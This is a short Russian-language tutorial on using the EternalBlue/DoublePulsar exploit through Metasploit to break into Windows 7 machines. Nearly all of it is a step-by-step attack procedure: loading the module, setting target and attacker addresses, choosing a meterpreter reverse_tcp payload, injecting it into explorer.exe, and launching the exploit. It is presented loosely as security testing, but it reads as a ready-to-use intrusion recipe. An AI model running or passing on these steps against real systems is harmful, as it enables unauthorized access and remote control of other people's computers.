Сегодня мы будем использовать эксплоит EternalBlue Doublepulsar для взлома Windows 7

Для того чтобы EternalBlue заработал нужно скачать дополнения по этой ссылке и распаковать именно в root (Там же будет сам эксплоит, перетащите его в /usr/share/Metasploit-Framework/modules/exploit/windows/smb/), а так же установить/обновить wine, чтобы появились файлы wine в root.

Приступим к тестированию безопасности windows 7:

Запускаем metasploit:

msfconsole

Выбираем эксплоит:

use exploit/windows/smb/EternalBlue-Doublepulsar

Вводим IP адрес цели:

set RHOST <ip>

Вводим свой IP:

set LHOST <IP>

Выбираем архитектуру системы конечного компьютера (не обязательно):

set targetarchitecture <x32/x64>

Выбираем полезную нагрузку (payload) (можно любой, он будет загружен и активирован):

set payload <Ex:windows/x64/meterpreter/reverse_tcp>

Кстати, посмотреть все payload можно этой командой:

msfvenom -l paylaod

Дальше выбираем процесс в который будем инжектить наш payload:

set processinject <Ex: explorer.exe>

И, наконец, можно активировать эксплоит:

exploit

Или

run

Поздравляю, вы эксплуатировали уязвимость windows 7.